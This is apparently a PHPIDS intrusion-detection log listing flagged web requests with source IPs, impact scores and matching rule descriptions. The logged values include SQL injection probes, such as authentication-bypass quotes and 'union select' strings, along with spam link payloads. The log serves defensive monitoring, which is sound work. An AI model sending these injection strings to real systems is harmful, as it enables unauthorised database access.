Value:security/networkprinterhacking' and 'a'='a
Page:/i.php?page=security/networkprinterhacking'%20and%20'a'='a
IP:95.121.154.27
Impact:34
Created:2010-04-22 07:55:10
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122261
Name:REQUEST.page
Value:security/networkprinterhacking' and user=0 and '1'='1
Page:/i.php?page=security/networkprinterhacking'%20and%20user=0%20and%20'1'='1
IP:95.121.154.27
Impact:56
Created:2010-04-22 07:54:39
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122262
Name:GET.page
Value:security/networkprinterhacking' and user=0 and '1'='1
Page:/i.php?page=security/networkprinterhacking'%20and%20user=0%20and%20'1'='1
IP:95.121.154.27
Impact:56
Created:2010-04-22 07:54:39
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122259
Name:REQUEST.page
Value:security/networkprinterhacking' and user=0 and '1'='1
Page:/i.php?page=security/networkprinterhacking'%20and%20user=0%20and%20'1'='1
IP:95.121.154.27
Impact:56
Created:2010-04-22 07:54:29
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122260
Name:GET.page
Value:security/networkprinterhacking' and user=0 and '1'='1
Page:/i.php?page=security/networkprinterhacking'%20and%20user=0%20and%20'1'='1
IP:95.121.154.27
Impact:56
Created:2010-04-22 07:54:29
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122257
Name:REQUEST.page
Value:security/networkprinterhacking' and user=0--
Page:/i.php?page=security/networkprinterhacking'%20and%20user=0--
IP:95.121.154.27
Impact:32
Created:2010-04-22 07:54:21
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122258
Name:GET.page
Value:security/networkprinterhacking' and user=0--
Page:/i.php?page=security/networkprinterhacking'%20and%20user=0--
IP:95.121.154.27
Impact:32
Created:2010-04-22 07:54:21
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122255
Name:REQUEST.page
Value:security/networkprinterhacking' and user=0--
Page:/i.php?page=security/networkprinterhacking'%20and%20user=0--
IP:95.121.154.27
Impact:32
Created:2010-04-22 07:54:17
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122256
Name:GET.page
Value:security/networkprinterhacking' and user=0--
Page:/i.php?page=security/networkprinterhacking'%20and%20user=0--
IP:95.121.154.27
Impact:32
Created:2010-04-22 07:54:17
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122253
Name:REQUEST.page
Value:security/networkprinterhacking and user=0--
Page:/i.php?page=security/networkprinterhacking%20and%20user=0--
IP:95.121.154.27
Impact:18
Created:2010-04-22 07:54:12
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:122254
Name:GET.page
Value:security/networkprinterhacking and user=0--
Page:/i.php?page=security/networkprinterhacking%20and%20user=0--
IP:95.121.154.27
Impact:18
Created:2010-04-22 07:54:12
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:122251
Name:REQUEST.page
Value:security/networkprinterhacking and user=0--
Page:/i.php?page=security/networkprinterhacking%20and%20user=0--
IP:95.121.154.27
Impact:18
Created:2010-04-22 07:54:08
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:122252
Name:GET.page
Value:security/networkprinterhacking and user=0--
Page:/i.php?page=security/networkprinterhacking%20and%20user=0--
IP:95.121.154.27
Impact:18
Created:2010-04-22 07:54:08
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:122249
Name:REQUEST.page
Value:security/networkprinterhacking and user=0 and 1=1
Page:/i.php?page=security/networkprinterhacking%20and%20user=0%20and%201=1
IP:95.121.154.27
Impact:12
Created:2010-04-22 07:53:42
Details:
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:122250
Name:GET.page
Value:security/networkprinterhacking and user=0 and 1=1
Page:/i.php?page=security/networkprinterhacking%20and%20user=0%20and%201=1
IP:95.121.154.27
Impact:12
Created:2010-04-22 07:53:42
Details:
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:122247
Name:REQUEST.page
Value:security/networkprinterhacking and user=0 and 1=1
Page:/i.php?page=security/networkprinterhacking%20and%20user=0%20and%201=1
IP:95.121.154.27
Impact:12
Created:2010-04-22 07:53:37
Details:
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:122248
Name:GET.page
Value:security/networkprinterhacking and user=0 and 1=1
Page:/i.php?page=security/networkprinterhacking%20and%20user=0%20and%201=1
IP:95.121.154.27
Impact:12
Created:2010-04-22 07:53:37
Details:
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:122245
Name:REQUEST.codeme
Value::-), <a href= http://secretariesinshortskirts.tumblr.com/ >secretaries in short skirts stockings</a>, [url= http://secretariesinshortskirts.tumblr.com/ ]secretaries in short skirts stockings[/url], gqj,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:38
Created:2010-04-22 07:26:21
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:122246
Name:POST.codeme
Value::-), <a href= http://secretariesinshortskirts.tumblr.com/ >secretaries in short skirts stockings</a>, [url= http://secretariesinshortskirts.tumblr.com/ ]secretaries in short skirts stockings[/url], gqj,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:38
Created:2010-04-22 07:26:21
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:122243
Name:REQUEST.page
Value:--'security'/h
Page:/i.php?page=--%27security%27/h
IP:67.195.111.36
Impact:6
Created:2010-04-22 07:01:59
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122244
Name:GET.page
Value:--'security'/h
Page:/i.php?page=--%27security%27/h
IP:67.195.111.36
Impact:6
Created:2010-04-22 07:01:59
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122241
Name:REQUEST.page
Value:security/ps2 and 0=1 union select -and-usb-hardware-keyloggers-3-keyllama
Page:/i.php?page=security/ps2+and+0=1+union+select+-and-usb-hardware-keyloggers-3-keyllama
IP:113.169.128.6
Impact:20
Created:2010-04-22 05:58:58
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122242
Name:GET.page
Value:security/ps2 and 0=1 union select -and-usb-hardware-keyloggers-3-keyllama
Page:/i.php?page=security/ps2+and+0=1+union+select+-and-usb-hardware-keyloggers-3-keyllama
IP:113.169.128.6
Impact:20
Created:2010-04-22 05:58:58
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122239
Name:REQUEST.page
Value:security/usb-hardware-keyloggers-1 and 0=1 union select -keycarbon
Page:/i.php?page=security/usb-hardware-keyloggers-1+and+0=1+union+select+-keycarbon
IP:113.169.128.6
Impact:20
Created:2010-04-22 05:58:57
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122240
Name:GET.page
Value:security/usb-hardware-keyloggers-1 and 0=1 union select -keycarbon
Page:/i.php?page=security/usb-hardware-keyloggers-1+and+0=1+union+select+-keycarbon
IP:113.169.128.6
Impact:20
Created:2010-04-22 05:58:57
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122237
Name:REQUEST.codeme
Value:I like it so much, <a href= http://fendipurses.tumblr.com/ >fendi purses</a>, [url= http://fendipurses.tumblr.com/ ]fendi purses[/url], 6365,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 05:49:58
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122238
Name:POST.codeme
Value:I like it so much, <a href= http://fendipurses.tumblr.com/ >fendi purses</a>, [url= http://fendipurses.tumblr.com/ ]fendi purses[/url], 6365,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 05:49:58
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122235
Name:REQUEST.codeme
Value:ZUvTwF <a href="http://gzfxtwvoklkz.com/">gzfxtwvoklkz</a>, [url=http://tkfunezogffz.com/]tkfunezogffz[/url], [link=http://ftuqepxiqrvz.com/]ftuqepxiqrvz[/link], http://qtyjfpwluybh.com/
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:173.13.75.237
Impact:48
Created:2010-04-22 05:43:02
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122236
Name:POST.codeme
Value:ZUvTwF <a href="http://gzfxtwvoklkz.com/">gzfxtwvoklkz</a>, [url=http://tkfunezogffz.com/]tkfunezogffz[/url], [link=http://ftuqepxiqrvz.com/]ftuqepxiqrvz[/link], http://qtyjfpwluybh.com/
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:173.13.75.237
Impact:48
Created:2010-04-22 05:43:02
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122234
Name:GET.bcsi-ac-4E050338BC5CF7E7
Value:19CBB77900000005ALUQLc9yoQVyDVWAHXuWKv apHofAAAABQAAAPNrHACAcAAAAgAAANyAAAA=
Page:/?bcsi-ac-4E050338BC5CF7E7=19CBB77900000005ALUQLc9yoQVyDVWAHXuWKv+apHofAAAABQAAAPNrHACAcAAAAgAAANyAAAA=
IP:67.195.111.36
Impact:22
Created:2010-04-22 05:36:35
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.3333333333333

ID:122233
Name:REQUEST.bcsi-ac-4E050338BC5CF7E7
Value:19CBB77900000005ALUQLc9yoQVyDVWAHXuWKv apHofAAAABQAAAPNrHACAcAAAAgAAANyAAAA=
Page:/?bcsi-ac-4E050338BC5CF7E7=19CBB77900000005ALUQLc9yoQVyDVWAHXuWKv+apHofAAAABQAAAPNrHACAcAAAAgAAANyAAAA=
IP:67.195.111.36
Impact:22
Created:2010-04-22 05:36:34
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.3333333333333

ID:122231
Name:REQUEST.codeme
Value:Give somebody the to a site about the, <a href= http://louisvuittonpurse.tumblr.com/#1 >Cheap louis vuitton purse</a> [url=http://louisvuittonpurse.tumblr.com/#1]Cheap louis vuitton purse[/url], 741,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-22 05:10:15
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122232
Name:POST.codeme
Value:Give somebody the to a site about the, <a href= http://louisvuittonpurse.tumblr.com/#1 >Cheap louis vuitton purse</a> [url=http://louisvuittonpurse.tumblr.com/#1]Cheap louis vuitton purse[/url], 741,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-22 05:10:15
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122229
Name:REQUEST.codeme
Value:nh0Gyj <a href="http://hweiqncvvjgl.com/">hweiqncvvjgl</a>, [url=http://pftxebnwtiad.com/]pftxebnwtiad[/url], [link=http://fagfsxtcmeiq.com/]fagfsxtcmeiq[/link], http://ihehudpjywhh.com/
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:67.19.244.2
Impact:48
Created:2010-04-22 04:10:21
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122230
Name:POST.codeme
Value:nh0Gyj <a href="http://hweiqncvvjgl.com/">hweiqncvvjgl</a>, [url=http://pftxebnwtiad.com/]pftxebnwtiad[/url], [link=http://fagfsxtcmeiq.com/]fagfsxtcmeiq[/link], http://ihehudpjywhh.com/
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:67.19.244.2
Impact:48
Created:2010-04-22 04:10:21
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122227
Name:REQUEST.codeme
Value:can you do thi for me, <a href= http://leatherpursehandles.tumblr.com/#1 >All about leather purse handles</a> [url=http://leatherpursehandles.tumblr.com/#1]All about leather purse handles[/url], noufu,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-22 03:51:19
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122228
Name:POST.codeme
Value:can you do thi for me, <a href= http://leatherpursehandles.tumblr.com/#1 >All about leather purse handles</a> [url=http://leatherpursehandles.tumblr.com/#1]All about leather purse handles[/url], noufu,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-22 03:51:19
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122225
Name:REQUEST.bcsi-ac-4E050338BC5CF7E7
Value:1A147ADC0000000552Q7DrS4FDG6WhzmkJB3MKiazPofAAAABQAAAGehHACAcAAAAgAAAPRZAQA=
Page:/?bcsi-ac-4E050338BC5CF7E7=1A147ADC0000000552Q7DrS4FDG6WhzmkJB3MKiazPofAAAABQAAAGehHACAcAAAAgAAAPRZAQA=
IP:67.195.111.36
Impact:14
Created:2010-04-22 03:19:56
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.15625

ID:122226
Name:GET.bcsi-ac-4E050338BC5CF7E7
Value:1A147ADC0000000552Q7DrS4FDG6WhzmkJB3MKiazPofAAAABQAAAGehHACAcAAAAgAAAPRZAQA=
Page:/?bcsi-ac-4E050338BC5CF7E7=1A147ADC0000000552Q7DrS4FDG6WhzmkJB3MKiazPofAAAABQAAAGehHACAcAAAAgAAAPRZAQA=
IP:67.195.111.36
Impact:14
Created:2010-04-22 03:19:56
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.15625

ID:122223
Name:REQUEST.page
Value:videos/owasp-top-5 and 0=1 union select -louisville
Page:/i.php?page=videos/owasp-top-5+and+0=1+union+select+-louisville
IP:113.169.128.6
Impact:20
Created:2010-04-22 03:17:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122224
Name:GET.page
Value:videos/owasp-top-5 and 0=1 union select -louisville
Page:/i.php?page=videos/owasp-top-5+and+0=1+union+select+-louisville
IP:113.169.128.6
Impact:20
Created:2010-04-22 03:17:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122221
Name:REQUEST.page
Value:security/phpids-install-notes and 0=1 union select
Page:/i.php?page=security/phpids-install-notes+and+0=1+union+select+
IP:113.169.128.6
Impact:20
Created:2010-04-22 03:17:25
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122222
Name:GET.page
Value:security/phpids-install-notes and 0=1 union select
Page:/i.php?page=security/phpids-install-notes+and+0=1+union+select+
IP:113.169.128.6
Impact:20
Created:2010-04-22 03:17:25
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122219
Name:REQUEST.codeme
Value:I like your work!, <a href= http://pursehandles.tumblr.com/ >purse handles now</a>, [url= http://pursehandles.tumblr.com/ ]purse handles now[/url], qbd,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 03:12:10
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122220
Name:POST.codeme
Value:I like your work!, <a href= http://pursehandles.tumblr.com/ >purse handles now</a>, [url= http://pursehandles.tumblr.com/ ]purse handles now[/url], qbd,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 03:12:10
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122217
Name:REQUEST.page
Value:security/phpids-install-notes and 0=1 union select
Page:/i.php?page=security/phpids-install-notes+and+0=1+union+select+
IP:113.169.128.6
Impact:20
Created:2010-04-22 02:45:39
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122218
Name:GET.page
Value:security/phpids-install-notes and 0=1 union select
Page:/i.php?page=security/phpids-install-notes+and+0=1+union+select+
IP:113.169.128.6
Impact:20
Created:2010-04-22 02:45:39
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122215
Name:REQUEST.page
Value:security/pebuildertutorial and 0=1 union select
Page:/i.php?page=security/pebuildertutorial+and+0=1+union+select+
IP:118.71.127.109
Impact:20
Created:2010-04-22 02:36:04
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122216
Name:GET.page
Value:security/pebuildertutorial and 0=1 union select
Page:/i.php?page=security/pebuildertutorial+and+0=1+union+select+
IP:118.71.127.109
Impact:20
Created:2010-04-22 02:36:04
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122213
Name:REQUEST.page
Value:security/localsamcrack2 and 0=1 union select
Page:/i.php?page=security/localsamcrack2+and+0=1+union+select+
IP:118.71.127.109
Impact:20
Created:2010-04-22 02:35:57
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122214
Name:GET.page
Value:security/localsamcrack2 and 0=1 union select
Page:/i.php?page=security/localsamcrack2+and+0=1+union+select+
IP:118.71.127.109
Impact:20
Created:2010-04-22 02:35:57
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122211
Name:REQUEST.codeme
Value:Beautiful site, <a href= http://verabradleypurses.tumblr.com/#1 >All about vera bradley purses</a> [url=http://verabradleypurses.tumblr.com/#1]All about vera bradley purses[/url], %]],
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-22 02:33:14
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:122212
Name:POST.codeme
Value:Beautiful site, <a href= http://verabradleypurses.tumblr.com/#1 >All about vera bradley purses</a> [url=http://verabradleypurses.tumblr.com/#1]All about vera bradley purses[/url], %]],
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-22 02:33:14
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:122209
Name:REQUEST.codeme
Value:Your Site Is Great, <a href= http://purseorganizer.tumblr.com/ >purse organizer here</a>, [url= http://purseorganizer.tumblr.com/ ]purse organizer here[/url], >:D,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 01:54:02
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122210
Name:POST.codeme
Value:Your Site Is Great, <a href= http://purseorganizer.tumblr.com/ >purse organizer here</a>, [url= http://purseorganizer.tumblr.com/ ]purse organizer here[/url], >:D,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 01:54:02
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122207
Name:REQUEST.page
Value:security/wigletogoogleearth and 0=1 union select
Page:/i.php?page=security/wigletogoogleearth+and+0=1+union+select+
IP:118.71.127.109
Impact:20
Created:2010-04-22 00:06:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122208
Name:GET.page
Value:security/wigletogoogleearth and 0=1 union select
Page:/i.php?page=security/wigletogoogleearth+and+0=1+union+select+
IP:118.71.127.109
Impact:20
Created:2010-04-22 00:06:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122205
Name:REQUEST.page
Value:videos/owasp-top-5 and 0=1 union select -louisville
Page:/i.php?page=videos/owasp-top-5+and+0=1+union+select+-louisville
IP:118.71.127.109
Impact:20
Created:2010-04-22 00:06:25
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122206
Name:GET.page
Value:videos/owasp-top-5 and 0=1 union select -louisville
Page:/i.php?page=videos/owasp-top-5+and+0=1+union+select+-louisville
IP:118.71.127.109
Impact:20
Created:2010-04-22 00:06:25
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122203
Name:REQUEST.codeme
Value:Incredible site!, <a href= http://newoldnursingschools.tumblr.com/#1 >nursing schools</a> [url=http://newoldnursingschools.tumblr.com/#1]nursing schools[/url], awmh,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 23:34:33
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
